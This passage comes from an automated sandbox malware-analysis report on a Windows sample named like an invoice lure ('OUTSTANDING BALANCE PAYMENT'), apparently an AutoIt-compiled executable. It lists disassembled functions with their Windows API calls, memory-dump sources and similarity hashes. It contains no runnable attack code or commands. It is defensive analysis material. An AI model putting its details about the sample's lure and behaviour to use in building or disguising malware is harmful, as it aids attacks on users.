                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: 2f6ee5f05f720aba0d45b85d5994848ce90a3f91d942b8079f5ec57abb447a45
                                                                  • Instruction ID: 4fee82db0cca4637ba3629db049bc88c7260fc170f43de0da432fcaca3f9c439
                                                                  • Opcode Fuzzy Hash: 2f6ee5f05f720aba0d45b85d5994848ce90a3f91d942b8079f5ec57abb447a45
                                                                  • Instruction Fuzzy Hash: F811363591102EBBCF12DF98DD459AEB7BDEF09304F820452E911E7150D774AAA1CBA1
                                                                  Function 002C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002C7352
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 002C7385
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002C739B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002C73A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 3d43c6c32862d18fe745905fdd8fea020795f48742668644ad0c90e67a575589
                                                                  • Instruction ID: 5a33b5efe742e85249deb86668ab7413ca1f32607e1e6c360f5b273c3a566c05
                                                                  • Opcode Fuzzy Hash: 3d43c6c32862d18fe745905fdd8fea020795f48742668644ad0c90e67a575589
                                                                  • Instruction Fuzzy Hash: D511E176A14255BBC7029FA8DC05F9E7BED9B46320F04435AF825D32A1DAB099149BA0
                                                                  Function 0029D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                  • GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: fac72a021f3b11d49e80a2cfc848512b3b9e0f1fab5f358b8d8e8624fa66e852
                                                                  • Instruction ID: 7bd3004d0555501de383165864ed2317a8c7f86d20de284ff019324d04ba9f14
                                                                  • Opcode Fuzzy Hash: fac72a021f3b11d49e80a2cfc848512b3b9e0f1fab5f358b8d8e8624fa66e852
                                                                  • Instruction Fuzzy Hash: 5A11AD7311250ABFEF024FA4DC50EEABB6DFF09764F050112FA1952060C771DC60ABA0
                                                                  Function 002B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction ID: 7e320560a0ea9234525e83239aa0761684337c26443643d0891c08ef87b3fd74
                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction Fuzzy Hash: 76014B3202014ABBCF126E84DC81CEE3F62BB18390B588455FE1859132D336DAB1AB81
                                                                  Function 002A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002A7A0D: __getptd_noexit.LIBCMT ref: 002A7A0E
                                                                  • __lock.LIBCMT ref: 002A748F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 002A74AC
                                                                  • _free.LIBCMT ref: 002A74BF
                                                                  • InterlockedIncrement.KERNEL32(011F3920), ref: 002A74D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 2704283638-0
                                                                  • Opcode ID: 38bfcf80041cf6a0f4ef0eacc20c094b41123bbb03e555e5cbc5bca5cf747338
                                                                  • Instruction ID: 022e67f337847b6891b49fd6f4b4ca56a1ad5190fa9df5f7ff8ac4670f45904f
                                                                  • Opcode Fuzzy Hash: 38bfcf80041cf6a0f4ef0eacc20c094b41123bbb03e555e5cbc5bca5cf747338
                                                                  • Instruction Fuzzy Hash: 6101D63592AB12ABC713AF649C4975DBB70BF0A721F14401AF454A3681CF305921CFDA
                                                                  Function 002EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                    • Part of subcall function 0029AF83: BeginPath.GDI32(?), ref: 0029B009
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EEA8E
                                                                  • LineTo.GDI32(00000000,?,?), ref: 002EEA9B
                                                                  • EndPath.GDI32(00000000), ref: 002EEAAB
                                                                  • StrokePath.GDI32(00000000), ref: 002EEAB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: c10f8cfe1d1bbb85cf1504f3802636ff11bce38b31ad57f38deafebabef27e3c
                                                                  • Instruction ID: 0a2133821069d85fe0f7a37b9b5b36981b9f445dec7b6fc0b0b184108b286782
                                                                  • Opcode Fuzzy Hash: c10f8cfe1d1bbb85cf1504f3802636ff11bce38b31ad57f38deafebabef27e3c
                                                                  • Instruction Fuzzy Hash: 17F0BE31042259BBDB139F94AC09FCA3F5DAF06310F044102FE01640E187789561CBD5
                                                                  Function 002BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BC84A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 002BC85D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002BC864
                                                                  • AttachThreadInput.USER32(00000000), ref: 002BC86B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: daacde840b32d83028d3a466e91268e99cee991acd63e22d900d0f9dfe7c61d4
                                                                  • Instruction ID: 5034aea306c4fd6c5d4a83bce998a37532a34e123104b42d50fa19bc20794acc
                                                                  • Opcode Fuzzy Hash: daacde840b32d83028d3a466e91268e99cee991acd63e22d900d0f9dfe7c61d4
                                                                  • Instruction Fuzzy Hash: 91E06D71142228BADB221FA2DC0DEDB7F9CEF067A1F408022B60D85461C6B2C590CBE0
                                                                  Function 002BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 002BB0D6
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,002BAC9D), ref: 002BB0DD
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002BAC9D), ref: 002BB0EA
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,002BAC9D), ref: 002BB0F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 81f4028ff608c9d6a7f85951d71a5668968088d0a18b2c79e76f19d88d9ac640
                                                                  • Instruction ID: ebb9f7bfa555af9cde88deba819dc4fd1f7dba41ac6e9bd252a6d3b58de0e686
                                                                  • Opcode Fuzzy Hash: 81f4028ff608c9d6a7f85951d71a5668968088d0a18b2c79e76f19d88d9ac640
                                                                  • Instruction Fuzzy Hash: A7E086726022129BD7212FF15C1CB973BECEF557D1F018819F245DA040DB748401C760
                                                                  Function 0029B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0029B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0029B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0029B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0029B4BD
                                                                  • GetWindowDC.USER32(?,00000000), ref: 002FDE2B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 002FDE38
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 002FDE51
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 002FDE6A
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 002FDE8A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FDE95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: 0bd69107ff75a7dc6f9c28a20ab117346923701782236d45742abf8e43624277
                                                                  • Instruction ID: d89872f78907dbf6c01a731ec0f5c8ecc3cf22fbd74305d25bb95164b8277704
                                                                  • Opcode Fuzzy Hash: 0bd69107ff75a7dc6f9c28a20ab117346923701782236d45742abf8e43624277
                                                                  • Instruction Fuzzy Hash: AEE06D31110245AADF221FB8BC1DBE87F55AB12339F00C267FB69580E1C7714590DB11
                                                                  Function 002FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: a03bfce4cfc9edb49f07c97bab121b588885ec301b346f9645a18e5d04f8d74f
                                                                  • Instruction ID: fd4c2877f6c60b09983682ff814f2e33aa8bdb91c91456820b83efe71bc8b324
                                                                  • Opcode Fuzzy Hash: a03bfce4cfc9edb49f07c97bab121b588885ec301b346f9645a18e5d04f8d74f
                                                                  • Instruction Fuzzy Hash: C3E04FB1111208EFEB025FB0DC5862E7BE8EB4C351F11C817FD5A87210CBB598409F40
                                                                  Function 002BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002BB2DF
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 002BB2EB
                                                                  • CloseHandle.KERNEL32(?), ref: 002BB2F4
                                                                  • CloseHandle.KERNEL32(?), ref: 002BB2FC
                                                                    • Part of subcall function 002BAB24: GetProcessHeap.KERNEL32(00000000,?,002BA848), ref: 002BAB2B
                                                                    • Part of subcall function 002BAB24: HeapFree.KERNEL32(00000000), ref: 002BAB32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: f73cee573c3be1596cf1e771a18026e973fed0b5ef73ed19ddd0b6fcb9c9339a
                                                                  • Instruction ID: 06247ee8f427b78dfb3892393f093781e701b914ba5e0baa19e2d84524ad9df2
                                                                  • Opcode Fuzzy Hash: f73cee573c3be1596cf1e771a18026e973fed0b5ef73ed19ddd0b6fcb9c9339a
                                                                  • Instruction Fuzzy Hash: B8E0BF3A105005BBCB022FD5EC18859FFAAFF983217109622F62581571CB329471EB51
                                                                  Function 002FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 03cc5c51de4dee416527a4da52701fb83c74ab40c5d6e63a65c76c852229bce9
                                                                  • Instruction ID: 6ca9e6ef8960683e8fdf55dcd683b21db8d71bea42c1b141e07a5f0a52e2de67
                                                                  • Opcode Fuzzy Hash: 03cc5c51de4dee416527a4da52701fb83c74ab40c5d6e63a65c76c852229bce9
                                                                  • Instruction Fuzzy Hash: 16E046B1501208EFEF025FB0DC5862D7BE8EB4C350F12880AF95E8B210CBBA98408F00
                                                                  Function 002BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 002BDEAA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  • Opcode ID: e0f7456e197f6248bb424ddc4f28eca3eddb76e18609bd0705f172e794105cd1
                                                                  • Instruction ID: 4cb83286c4e464707d4bd109646aa4042d7f7e3dc5a82d8d61d50c8a99072c64
                                                                  • Opcode Fuzzy Hash: e0f7456e197f6248bb424ddc4f28eca3eddb76e18609bd0705f172e794105cd1
                                                                  • Instruction Fuzzy Hash: 15914774610602AFDB54CF64C884BAAB7F9BF48750F14846DF94ACB691EBB0E851CF60
                                                                  Function 002C290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy
                                                                  • String ID: I//$I//
                                                                  • API String ID: 3048848545-272788464
                                                                  • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                  • Instruction ID: c76e104de0bab7604618d9356b6cb4bae2cb06cd42e4c250b8b4130dfc1d2014
                                                                  • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                  • Instruction Fuzzy Hash: 2741B135920216EACF25EF98C451EFCB770EF08710F60525EE881A7191DF705AAA8BA4
                                                                  Function 0029BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0029BCDA
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0029BCF3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: b241a58b590602fb44e0e0656b88661e2ab348d245923d7c595c9bb427fc0fc3
                                                                  • Instruction ID: c83cbff7a390c93ac7bc0a50ff49bbe9e7ad31f5908ebd36e12932c3c8554f41
                                                                  • Opcode Fuzzy Hash: b241a58b590602fb44e0e0656b88661e2ab348d245923d7c595c9bb427fc0fc3
                                                                  • Instruction Fuzzy Hash: FE512371419744ABE720AF54E886BAFBBECFF98354F41484EF1C8410A2DB7095ACCB52
                                                                  Function 002CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002844ED: __fread_nolock.LIBCMT ref: 0028450B
                                                                  • _wcscmp.LIBCMT ref: 002CC65D
                                                                  • _wcscmp.LIBCMT ref: 002CC670
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  • Opcode ID: a5e63bdc3daed38a6d3b659b95ed004111435fe40c70f57e0fa64f2ad028324a
                                                                  • Instruction ID: ce6bb75cace23316368011c1384f4208fe0658577999d83117d4d8ba593b9ef9
                                                                  • Opcode Fuzzy Hash: a5e63bdc3daed38a6d3b659b95ed004111435fe40c70f57e0fa64f2ad028324a
